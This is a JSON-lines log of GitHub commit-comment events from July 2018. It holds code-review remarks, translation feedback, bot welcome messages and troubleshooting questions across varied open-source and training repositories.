{"id":"7903591368","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conan-feedstock"},"payload":{"comment":{"id":29559278,"position":null,"line":null,"path":null,"commit_id":"ee65847c640d4687e3dcd28a08a2d7ef42e0f3bc","created_at":"2018-07-01T20:00:59Z","updated_at":"2018-07-01T20:00:59Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @memsharded were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @memsharded were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T20:00:59Z"}
{"id":"7903591765","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29559279,"position":28,"line":28,"path":"NET.S.2018.Shaveko.03/NewtonMethod/NewtonMethodSqrt.cs","commit_id":"b0fb080608f7c42805c8bfbcb55bdbdb51f5afac","created_at":"2018-07-01T20:01:14Z","updated_at":"2018-07-01T20:01:14Z","author_association":"NONE","body":"названия x0, x1 гарантировано хуже чем next previous current и т.п."}},"created_at":"2018-07-01T20:01:14Z"}
{"id":"7903592835","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559281,"position":512,"line":512,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"df46d634c245ff83cabb0404a39c778cb998ed62","created_at":"2018-07-01T20:01:59Z","updated_at":"2018-07-01T20:01:59Z","author_association":"COLLABORATOR","body":"\"Your wallet needs access to...\" по-человечески скорее переводится как \"Кошельку/Приложению требуется доступ к...\". \"Вашему\" тут излишне, т.к. в английском нужно всегда максимально конкретизировать объект, а в русском мы и так из контекста понимаем, что речь идёт о приложении, которым человек сейчас пользуется"}},"created_at":"2018-07-01T20:01:59Z"}
{"id":"7903593090","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29559282,"position":22,"line":4604,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"309b97960716bb470fb081b2532166a8b2fb671d","created_at":"2018-07-01T20:02:11Z","updated_at":"2018-07-01T20:02:11Z","author_association":"COLLABORATOR","body":"My mistake, hould've been iv."}},"created_at":"2018-07-01T20:02:11Z"}
{"id":"7903593321","type":"CommitCommentEvent","actor":{"login":"Lifeasarain"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29559283,"position":null,"line":null,"path":null,"commit_id":"8b8245d7aae2e99ada8b1bf9d32acf4ef2395f1b","created_at":"2018-07-01T20:02:22Z","updated_at":"2018-07-01T20:02:22Z","author_association":"NONE","body":"How can I deal with \"ITerritoryControlMinigameService/GetPlayerInfo failed -EReasult:0 -\r\n--This problem should resolve itself, wait for a couple of minutes\"\r\n"}},"created_at":"2018-07-01T20:02:22Z"}
{"id":"7903593459","type":"CommitCommentEvent","actor":{"login":"cairface"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29559284,"position":11,"line":11,"path":"linkshell_service/linkshell_service.lua","commit_id":"dd7bc6ec086e19ab9844cb47f5bc192096ad37a8","created_at":"2018-07-01T20:02:28Z","updated_at":"2018-07-01T20:02:28Z","author_association":"MEMBER","body":"I'm pretty sure this should exist as linkshell_data.data, and not its own local declaration. The lib will have no way to get to this."}},"created_at":"2018-07-01T20:02:28Z"}
{"id":"7903593685","type":"CommitCommentEvent","actor":{"login":"sigurdne"},"repo":{"name":"PorticoEstate/PorticoEstate"},"payload":{"comment":{"id":29559285,"position":14,"line":75,"path":"bookingfrontend/js/base/application_new.js","commit_id":"3d8dda7bc0c5994a526fcf5838f02c864b6ceade","created_at":"2018-07-01T20:02:38Z","updated_at":"2018-07-01T20:02:38Z","author_association":"CONTRIBUTOR","body":"Dette vil ikke virke når cookier er slått av\r\nvenligst bruk funksjonen phpGWLink()  !!!!!!!!!!!!!!!!!!!!!!!"}},"created_at":"2018-07-01T20:02:38Z"}
{"id":"7903593719","type":"CommitCommentEvent","actor":{"login":"kirill-u"},"repo":{"name":"epam-js-may-2018/homework-4-js"},"payload":{"comment":{"id":29559286,"position":null,"line":null,"path":null,"commit_id":"1ee62ed8fa6f2df565cec44ff9e5eb3ea3622c07","created_at":"2018-07-01T20:02:39Z","updated_at":"2018-07-01T20:02:39Z","author_association":"NONE","body":"👍 , but check for empty array."}},"created_at":"2018-07-01T20:02:39Z"}
{"id":"7903594888","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29559288,"position":16,"line":16,"path":"NET.S.2018.Shaveko.03/NewtonMethod/NewtonMethodSqrt.cs","commit_id":"b0fb080608f7c42805c8bfbcb55bdbdb51f5afac","created_at":"2018-07-01T20:03:31Z","updated_at":"2018-07-01T20:03:31Z","author_association":"NONE","body":"$\"Incorret accurancy\" заменить на $\"Incorret {nameof(accurancy)}\", аналогично ниже\r\n"}},"created_at":"2018-07-01T20:03:31Z"}
{"id":"7903595531","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29559289,"position":null,"line":null,"path":null,"commit_id":"d30c08cfe732cdc9a66d0237fd3f642854694156","created_at":"2018-07-01T20:04:01Z","updated_at":"2018-07-01T20:04:01Z","author_association":"NONE","body":"8821 support could be troublesome, as the \"halrf\" patch suddenly appears here, which can't be found in other versions, and I should really need the 8814 and 8821 support myself :/"}},"created_at":"2018-07-01T20:04:01Z"}
{"id":"7903596030","type":"CommitCommentEvent","actor":{"login":"kain88-de"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":29559293,"position":30,"line":87,"path":"package/MDAnalysis/lib/_cutil.pyx","commit_id":"13072497666aa99f0130ebf28ff5befce56d3fcc","created_at":"2018-07-01T20:04:21Z","updated_at":"2018-07-01T20:04:21Z","author_association":"MEMBER","body":"there are unnecessary on this function. You are using c++ data types that don't have boundscheck."}},"created_at":"2018-07-01T20:04:21Z"}
{"id":"7903599706","type":"CommitCommentEvent","actor":{"login":"AragurDEV"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29559300,"position":null,"line":null,"path":null,"commit_id":"d86471e45333be107283d47e931f96ea88e483df","created_at":"2018-07-01T20:07:03Z","updated_at":"2018-07-01T20:07:03Z","author_association":"NONE","body":"@Dadkill \r\nrandom_int() \"Returns a cryptographically secure random integer in the range min to max, inclusive.\"\r\nmt_rand \"This function does not generate cryptographically secure values\"\r\nSource: https://stackoverflow.com/questions/44228718/php-rand-vs-random-int"}},"created_at":"2018-07-01T20:07:03Z"}
{"id":"7903599930","type":"CommitCommentEvent","actor":{"login":"BenderBRod"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29559302,"position":null,"line":null,"path":null,"commit_id":"8b8245d7aae2e99ada8b1bf9d32acf4ef2395f1b","created_at":"2018-07-01T20:07:13Z","updated_at":"2018-07-01T20:07:13Z","author_association":"NONE","body":"wait for a couple of minutes"}},"created_at":"2018-07-01T20:07:13Z"}
{"id":"7903604735","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-C-"},"payload":{"comment":{"id":29559306,"position":77,"line":77,"path":"NET.S.2018.YACHNIK.03/PowNewtonMethod/FindingNRoot/RootNDegree.cs","commit_id":"66971dfe2ef0af92deffdd53c637cfd1a655ffc5","created_at":"2018-07-01T20:10:52Z","updated_at":"2018-07-01T20:10:52Z","author_association":"NONE","body":"можно использовать Math.Pow"}},"created_at":"2018-07-01T20:10:52Z"}
{"id":"7903604858","type":"CommitCommentEvent","actor":{"login":"Dadkill"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29559308,"position":null,"line":null,"path":null,"commit_id":"d86471e45333be107283d47e931f96ea88e483df","created_at":"2018-07-01T20:10:58Z","updated_at":"2018-07-01T20:10:58Z","author_association":"NONE","body":"Oh, I see! Thank you so much :)!"}},"created_at":"2018-07-01T20:10:58Z"}
{"id":"7903606532","type":"CommitCommentEvent","actor":{"login":"isaacmarlon"},"repo":{"name":"PauloVLB/ProjetoCacaPalavras"},"payload":{"comment":{"id":29559311,"position":55,"line":207,"path":"NetBeans/CacaPalavrasSwing/src/CacaPalavra.java","commit_id":"dea44f0a3912f989d02a757f23d564a5ae13279d","created_at":"2018-07-01T20:12:13Z","updated_at":"2018-07-01T20:12:13Z","author_association":"COLLABORATOR","body":"### m[i].length\r\n\r\n- O problema de usar essa sintaxe é quando uma matriz possui uma linha com o número de colunas menor do que i.\r\n\r\nEx.:\r\n\r\n```\r\nchar[][] matriz = {{'A','B','C','D'},{'L'},{'B','R','A','S'}};\r\n\t\t\r\nfor (int i = 0; i < matriz[i].length; i++) {\r\n\tSystem.out.println(\"Vou aparecer três vezes?\");\r\n}\r\n```\r\n> **Saída:** \r\n           Vou aparecer três vezes?\r\n\r\n- Idem quando i for maior do que a quantidade de linhas em uma matriz.\r\n\r\n```\r\nchar[][] matriz = {{'A','B','C','D'},{'L','U','L','A'},{'B','R','A','S'}};\r\n\t\t\r\nfor (int i = 0; i < matriz[i].length; i++) {}\r\n```\r\n\r\n> **Saída:** \r\n_Exception in thread \"main\" java.lang.ArrayIndexOutOfBoundsException: 3_\r\n\r\n### Conclusão:\r\n\r\nComo iremos trabalhar com uma matriz com o mesmo número de colunas em todas as linhas, basta controlar com a quantidade de colunas presentes em uma específica linha.\r\n\r\n**Segue uma solução:**\r\n\r\n```\r\n for (int i = 0; i < m[0].length; i++) {\r\n```\r\n@Doug3321 , @PauloVLB \r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-01T20:12:13Z"}
{"id":"7903607211","type":"CommitCommentEvent","actor":{"login":"Lifeasarain"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29559313,"position":null,"line":null,"path":null,"commit_id":"8b8245d7aae2e99ada8b1bf9d32acf4ef2395f1b","created_at":"2018-07-01T20:12:40Z","updated_at":"2018-07-01T20:12:40Z","author_association":"NONE","body":"I can run it on windows, but I cannot run it on cloud server with centos. I have waited for 10minutes"}},"created_at":"2018-07-01T20:12:40Z"}
{"id":"7903608117","type":"CommitCommentEvent","actor":{"login":"krrrcks"},"repo":{"name":"alex-hhh/frog"},"payload":{"comment":{"id":29559314,"position":null,"line":null,"path":null,"commit_id":"e6da79ec693f46b31017faf026184ee2700fde5c","created_at":"2018-07-01T20:13:21Z","updated_at":"2018-07-01T20:13:21Z","author_association":"NONE","body":"Hey! Not sure if you did but would you consider to send a PR for Greg for this feature? I would really appreciate to see sidebars in Frog. "}},"created_at":"2018-07-01T20:13:21Z"}
{"id":"7903608614","type":"CommitCommentEvent","actor":{"login":"AlenaYanova"},"repo":{"name":"epam-js-may-2018/homework-4-js"},"payload":{"comment":{"id":29559315,"position":null,"line":null,"path":null,"commit_id":"1ee62ed8fa6f2df565cec44ff9e5eb3ea3622c07","created_at":"2018-07-01T20:13:44Z","updated_at":"2018-07-01T20:13:44Z","author_association":"NONE","body":"What is better to use:\n1) return undefind,\n2) throw \"message\",\n3) throw new Error(\"message\")?\n\n2018-07-01 23:02 GMT+03:00 Kirill Uliashev <notifications@github.com>:\n\n> 👍 , but check for empty array.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epam-js-may-2018/homework-4-js/commit/1ee62ed8fa6f2df565cec44ff9e5eb3ea3622c07#commitcomment-29559286>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AbF_aDm2fOWFGnJNvvmwo1ebiZTQkvZbks5uCSrfgaJpZM4U-cwn>\n> .\n>\n"}},"created_at":"2018-07-01T20:13:44Z"}
{"id":"7903609744","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-C-"},"payload":{"comment":{"id":29559320,"position":130,"line":130,"path":"NET.S.2018.YACHNIK.03/PowNewtonMethod/FindingNRoot/RootNDegree.cs","commit_id":"66971dfe2ef0af92deffdd53c637cfd1a655ffc5","created_at":"2018-07-01T20:14:35Z","updated_at":"2018-07-01T20:14:35Z","author_association":"NONE","body":"не нужен"}},"created_at":"2018-07-01T20:14:35Z"}
{"id":"7903610128","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559321,"position":504,"line":504,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"df46d634c245ff83cabb0404a39c778cb998ed62","created_at":"2018-07-01T20:14:52Z","updated_at":"2018-07-01T20:14:52Z","author_association":"COLLABORATOR","body":"Скорее \"Вернуться к кошельку\", в кнопке должно быть действие, а не описание"}},"created_at":"2018-07-01T20:14:52Z"}
{"id":"7903610209","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-C-"},"payload":{"comment":{"id":29559322,"position":5,"line":5,"path":"NET.S.2018.YACHNIK.03/PowNewtonMethod/NunitNRootTests/UnitTest1.cs","commit_id":"66971dfe2ef0af92deffdd53c637cfd1a655ffc5","created_at":"2018-07-01T20:14:55Z","updated_at":"2018-07-01T20:14:55Z","author_association":"NONE","body":"пора переходить на NUnit"}},"created_at":"2018-07-01T20:14:55Z"}
{"id":"7903611178","type":"CommitCommentEvent","actor":{"login":"isaacmarlon"},"repo":{"name":"PauloVLB/ProjetoCacaPalavras"},"payload":{"comment":{"id":29559328,"position":36,"line":200,"path":"NetBeans/CacaPalavrasSwing/src/CacaPalavra.java","commit_id":"dea44f0a3912f989d02a757f23d564a5ae13279d","created_at":"2018-07-01T20:15:33Z","updated_at":"2018-07-01T20:15:33Z","author_association":"COLLABORATOR","body":"Como uma coluna pode ser normal e invertida ao mesmo tempo? \r\n\r\n@Doug3321 , @PauloVLB "}},"created_at":"2018-07-01T20:15:33Z"}
{"id":"7903612074","type":"CommitCommentEvent","actor":{"login":"evanwill"},"repo":{"name":"uidaholib/main-web-redesign_draft"},"payload":{"comment":{"id":29559331,"position":null,"line":null,"path":null,"commit_id":"fc0144522bd7bb594211e1079350d9ba761eec45","created_at":"2018-07-01T20:16:10Z","updated_at":"2018-07-01T20:16:10Z","author_association":"MEMBER","body":"i think a simpler strategy for the images is to put jumbotrons in the carousel, something like: \r\n\r\n`<div class=\"jumbotron jumbotron-fluid\" style=\"background-image: url('{{slide.image}}');background-size:cover;background-repeat:no-repeat;\">`\r\n\r\nthen put your content in the jumbotron--because it will be much easier to size and position than putting the images in directly. "}},"created_at":"2018-07-01T20:16:10Z"}
{"id":"7903616182","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/joommfutil-feedstock"},"payload":{"comment":{"id":29559335,"position":null,"line":null,"path":null,"commit_id":"5a2c9270cc7e4db8911ac9f6487b0c4387425508","created_at":"2018-07-01T20:19:21Z","updated_at":"2018-07-01T20:19:21Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T20:19:21Z"}
{"id":"7903618291","type":"CommitCommentEvent","actor":{"login":"SamuilDichev"},"repo":{"name":"SamuilDichev/Bashgammon"},"payload":{"comment":{"id":29559338,"position":62,"line":55,"path":"backgammon.py","commit_id":"f59a6c17c4b827d8494533737ab5159437dce13e","created_at":"2018-07-01T20:20:51Z","updated_at":"2018-07-01T20:20:51Z","author_association":"OWNER","body":"This caused a bug as the position for where you place the X which you free from the Jail was incorrectly calculated."}},"created_at":"2018-07-01T20:20:51Z"}
{"id":"7903619442","type":"CommitCommentEvent","actor":{"login":"andybak"},"repo":{"name":"IxxyXR/WarBells"},"payload":{"comment":{"id":29559339,"position":5,"line":81,"path":"Assets/3rdParty/ResonanceAudio/Editor/ResonanceAudioReverbBakingWindow.cs","commit_id":"86ef2bc3eab3c853023aae9d8127ef47189c0bfe","created_at":"2018-07-01T20:21:40Z","updated_at":"2018-07-01T20:21:40Z","author_association":"CONTRIBUTOR","body":"Bad Google! Hard-coding paths... I'd prefer not to fix this as it makes us brittle when we want to update Resonance itself. I'd prefer to bite the bullet and move Resonance back where it expects to be. (Whilst also filing a bug report with Google for their sloppy coding!)"}},"created_at":"2018-07-01T20:21:40Z"}
{"id":"7903621261","type":"CommitCommentEvent","actor":{"login":"rungene"},"repo":{"name":"rungene/JournalApp"},"payload":{"comment":{"id":29559344,"position":19,"line":19,"path":"README.md","commit_id":"ea6e2447b8f761dec1a93698808105221888133f","created_at":"2018-07-01T20:23:04Z","updated_at":"2018-07-01T20:23:04Z","author_association":"OWNER","body":"For Apk find it on the below link:\r\nhttps://github.com/rungene/Journal"}},"created_at":"2018-07-01T20:23:04Z"}
{"id":"7903629597","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559362,"position":null,"line":null,"path":null,"commit_id":"bc58c184d9fe2d51c239c0cdbecfef38e8bc54b5","created_at":"2018-07-01T20:29:17Z","updated_at":"2018-07-01T20:29:17Z","author_association":"MEMBER","body":"Was aware of this, figured it would be no problem to wait until all labels were renamed since those would have to be aligned again."}},"created_at":"2018-07-01T20:29:17Z"}
{"id":"7903632712","type":"CommitCommentEvent","actor":{"login":"narentin"},"repo":{"name":"DeviaVir/zenbot"},"payload":{"comment":{"id":29559371,"position":null,"line":null,"path":null,"commit_id":"0d0bfd3dbb4c91772c3f78a164bcbe59187f1661","created_at":"2018-07-01T20:31:08Z","updated_at":"2018-07-01T20:31:08Z","author_association":"NONE","body":"I'm running a simulation in maker (fee = 0%) and without --deposit option. \r\nAt the end of the simulation, the end balence is different before and after this commit (101.69 against 102.65).\r\n\r\nIs it intentional?\r\nWhat is the difference between s.net_currency, s.balance.currency and s.balance.deposit?"}},"created_at":"2018-07-01T20:31:08Z"}
{"id":"7903633891","type":"CommitCommentEvent","actor":{"login":"AnnaMy82"},"repo":{"name":"IxxyXR/WarBells"},"payload":{"comment":{"id":29559373,"position":5,"line":81,"path":"Assets/3rdParty/ResonanceAudio/Editor/ResonanceAudioReverbBakingWindow.cs","commit_id":"86ef2bc3eab3c853023aae9d8127ef47189c0bfe","created_at":"2018-07-01T20:32:03Z","updated_at":"2018-07-01T20:32:03Z","author_association":"CONTRIBUTOR","body":"Ah, I did move it back to where it was after fixing it. Sorry - forgot to mention that! It had to be fixed so the Baking window would work as normal. I reported it too :)\r\n"}},"created_at":"2018-07-01T20:32:03Z"}
{"id":"7903635243","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29559377,"position":null,"line":null,"path":null,"commit_id":"2344deb7e5b465fddb2df054a9078119a59bd70d","created_at":"2018-07-01T20:33:07Z","updated_at":"2018-07-01T20:33:07Z","author_association":"OWNER","body":"Thanks! :+1: "}},"created_at":"2018-07-01T20:33:07Z"}
{"id":"7903635754","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559378,"position":500,"line":500,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"df46d634c245ff83cabb0404a39c778cb998ed62","created_at":"2018-07-01T20:33:31Z","updated_at":"2018-07-01T20:33:31Z","author_association":"COLLABORATOR","body":"Я бы писал \"... BIP39-мнемоники\". Сейчас BIP39 начинает претендовать на свой отдельный смысл в предложении, и непонимающего пользователя введёт в заблуждение."}},"created_at":"2018-07-01T20:33:31Z"}
{"id":"7903635917","type":"CommitCommentEvent","actor":{"login":"cryptosharks131"},"repo":{"name":"cryptosharks131/NiceNOMP"},"payload":{"comment":{"id":29559379,"position":null,"line":null,"path":null,"commit_id":"a0a338956274035b870c0a6995b629e2f8f290fe","created_at":"2018-07-01T20:33:38Z","updated_at":"2018-07-01T20:33:38Z","author_association":"OWNER","body":"fixing invalid logger call on dup blocks - causes payment system to crash"}},"created_at":"2018-07-01T20:33:38Z"}
{"id":"7903637336","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559382,"position":497,"line":497,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"df46d634c245ff83cabb0404a39c778cb998ed62","created_at":"2018-07-01T20:34:39Z","updated_at":"2018-07-01T20:34:39Z","author_association":"COLLABORATOR","body":"Скорее \"своя комиссия\" или вообще \"задать вручную\""}},"created_at":"2018-07-01T20:34:39Z"}
{"id":"7903637674","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/micromagneticmodel-feedstock"},"payload":{"comment":{"id":29559384,"position":null,"line":null,"path":null,"commit_id":"223e63433f6c0adc6154b0adcc3c61466b97d660","created_at":"2018-07-01T20:34:56Z","updated_at":"2018-07-01T20:34:56Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T20:34:56Z"}
{"id":"7903641165","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559387,"position":459,"line":459,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"df46d634c245ff83cabb0404a39c778cb998ed62","created_at":"2018-07-01T20:37:30Z","updated_at":"2018-07-01T20:37:30Z","author_association":"COLLABORATOR","body":"Это явное продолжение предыдущей фразы, они просто разорваны полем, в которое будет подставляться необходимое значение. Соответственно, глагольные формы должны совпадать. Скорее нужно поменять оную в предыдущей строке"}},"created_at":"2018-07-01T20:37:30Z"}
{"id":"7903643153","type":"CommitCommentEvent","actor":{"login":"SM-REIGNS"},"repo":{"name":"SM-REIGNS/AlesB"},"payload":{"comment":{"id":29559389,"position":null,"line":null,"path":null,"commit_id":"9923b35e4d64ae14a2d5ec09fd3cbccfbe6b26fe","created_at":"2018-07-01T20:39:00Z","updated_at":"2018-07-01T20:39:00Z","author_association":"OWNER","body":"A web application to securely transfer images over web using image steganography with added encryption using AES encryption standard."}},"created_at":"2018-07-01T20:39:00Z"}
{"id":"7903643514","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559390,"position":82,"line":496,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"98ceb3169368b8739f2fad12749a474c1f42baf9","created_at":"2018-07-01T20:39:20Z","updated_at":"2018-07-01T20:39:20Z","author_association":"COLLABORATOR","body":"В английской версии нет ничего про часы, только цифры. Скорее они подставляются уже в интерфейсе, соответственно, отсюда их нужно убрать"}},"created_at":"2018-07-01T20:39:20Z"}
{"id":"7903644508","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29559395,"position":6,"line":31,"path":"authorization-service/src/main/resources/application.yml","commit_id":"76e84f247de55738cf3b9832c3537e1972fd0a6d","created_at":"2018-07-01T20:40:09Z","updated_at":"2018-07-01T20:40:09Z","author_association":"OWNER","body":"After upgrading from Finchley.RC1 to Finchley.RELEASE, there is `The dependencies of some of the beans in the application context form a cycle, with DataSourceConfiguration$Hikari.class and DataSourceInitializerInvoker`. As per [Spring Cloud Issue 355](https://github.com/spring-cloud/spring-cloud-commons/issues/355) setting `spring.cloud.refresh.enabled=false` in order to resolve this issue."}},"created_at":"2018-07-01T20:40:09Z"}
{"id":"7903644995","type":"CommitCommentEvent","actor":{"login":"Laurence-Cullen"},"repo":{"name":"MNegus/vapour_bubble"},"payload":{"comment":{"id":29559396,"position":null,"line":null,"path":null,"commit_id":"becad8eb37e2cb517c0407ecaff68cc61efd9b09","created_at":"2018-07-01T20:40:31Z","updated_at":"2018-07-01T20:40:31Z","author_association":"NONE","body":"Great commit message"}},"created_at":"2018-07-01T20:40:31Z"}
{"id":"7903645102","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559398,"position":46,"line":463,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"98ceb3169368b8739f2fad12749a474c1f42baf9","created_at":"2018-07-01T20:40:37Z","updated_at":"2018-07-01T20:40:37Z","author_association":"COLLABORATOR","body":"Здесь и далее программа, кажется, обращается к пользователю, т.е. это не текст кнопок. Должно быть \"Подтвердите PIN\" и так далее. Писать PIN или ПИН — тоже нужно решить"}},"created_at":"2018-07-01T20:40:37Z"}
{"id":"7903645259","type":"CommitCommentEvent","actor":{"login":"janbar"},"repo":{"name":"kodi-pvr/pvr.mythtv"},"payload":{"comment":{"id":29559399,"position":null,"line":null,"path":null,"commit_id":"793faafdf55966cc7e56812c9734afe5cc496b6c","created_at":"2018-07-01T20:40:44Z","updated_at":"2018-07-01T20:40:44Z","author_association":"MEMBER","body":"Hi @alanwww1 , \r\nthis repo is no longer used. The enabled repo is https://github.com/janbar/pvr.mythtv ."}},"created_at":"2018-07-01T20:40:44Z"}
{"id":"7903645552","type":"CommitCommentEvent","actor":{"login":"chidikalu"},"repo":{"name":"chidikalu/chidikalu.github.io"},"payload":{"comment":{"id":29559400,"position":null,"line":null,"path":null,"commit_id":"2fd165bca403bd46c3f4ee19b2bd930488f48908","created_at":"2018-07-01T20:41:00Z","updated_at":"2018-07-01T20:41:00Z","author_association":"OWNER","body":"Pixel Art maker\r\nThis project creates a pixel canvas to choose a color using the color picker and each cell has an event listener that will set the background color of the cell to the select color"}},"created_at":"2018-07-01T20:41:00Z"}
{"id":"7903645583","type":"CommitCommentEvent","actor":{"login":"AlexWayfer"},"repo":{"name":"zhiwenhuang/audio-equalizer-chrome"},"payload":{"comment":{"id":29559401,"position":null,"line":null,"path":null,"commit_id":"bb534b5fbec59abe634dce888709f5a7fbd84a89","created_at":"2018-07-01T20:41:01Z","updated_at":"2018-07-01T20:41:01Z","author_association":"NONE","body":"Why?!"}},"created_at":"2018-07-01T20:41:01Z"}
{"id":"7903645729","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559402,"position":19,"line":375,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-01T20:41:09Z","updated_at":"2018-07-01T20:41:09Z","author_association":"COLLABORATOR","body":"Ну не, тут нужно что-нибудь получше)"}},"created_at":"2018-07-01T20:41:09Z"}
{"id":"7903646918","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/simplehashtable"},"payload":{"comment":{"id":29559404,"position":null,"line":null,"path":null,"commit_id":"e1cc92b8accf437058f7a8a2e79a9cfd27fd6767","created_at":"2018-07-01T20:42:06Z","updated_at":"2018-07-01T20:42:06Z","author_association":"OWNER","body":"The test program is already really complex; I don't want to see annoying timespec stuff every time I look at it, so I isolated it into its own header."}},"created_at":"2018-07-01T20:42:06Z"}
{"id":"7903647111","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559405,"position":23,"line":379,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-01T20:42:13Z","updated_at":"2018-07-01T20:42:13Z","author_association":"COLLABORATOR","body":"Тогда уж \"развилка\" (предполагает разделение на строго два, как зачастую и есть) или \"разветвление\". Ну или просто писать \"форк\""}},"created_at":"2018-07-01T20:42:13Z"}
{"id":"7903649104","type":"CommitCommentEvent","actor":{"login":"kaczord"},"repo":{"name":"zone117x/cryptonote-easy-miner"},"payload":{"comment":{"id":29559408,"position":29,"line":56,"path":"CryptoNoteMiner/Main.cs","commit_id":"881a46e43dade2593c7300931b44d341953d03c1","created_at":"2018-07-01T20:43:41Z","updated_at":"2018-07-01T20:43:41Z","author_association":"NONE","body":"22694R3K1JvGf1m98pBsbaXCA3ULQz4xdQiYHgnNAdsVDqZDjiTH9CMj6QHhKD232wPeYtfypNzp5TX5L3NcGGSmJ8pWnPJ/0000000000000000000000000000000000000000000000000000000001853555"}},"created_at":"2018-07-01T20:43:41Z"}
